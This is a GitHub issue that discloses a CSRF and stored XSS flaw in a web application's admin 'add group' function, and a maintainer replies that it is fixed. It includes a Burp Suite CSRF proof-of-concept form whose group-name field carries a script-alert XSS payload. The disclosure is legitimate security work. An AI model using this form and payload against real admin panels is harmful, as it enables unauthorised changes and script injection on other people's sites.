Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
When adding a group
it has CSRF to add a group
The group's name could contain XSS payload. then it has stored XSS
<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1/admin.php/system/config/addgroup.html" method="POST"> <input type="hidden" name="name" value="qwer:<script>alert('hhhhhhhh')</script>" /> <input type="submit" value="Submit request" /> </form> </body> </html>
The text was updated successfully, but these errors were encountered:
已修复,谢谢反馈
Sorry, something went wrong.
No branches or pull requests
When adding a group

it has CSRF to add a group

The group's name could contain XSS payload. then it has stored XSS

CSRF poc
The text was updated successfully, but these errors were encountered: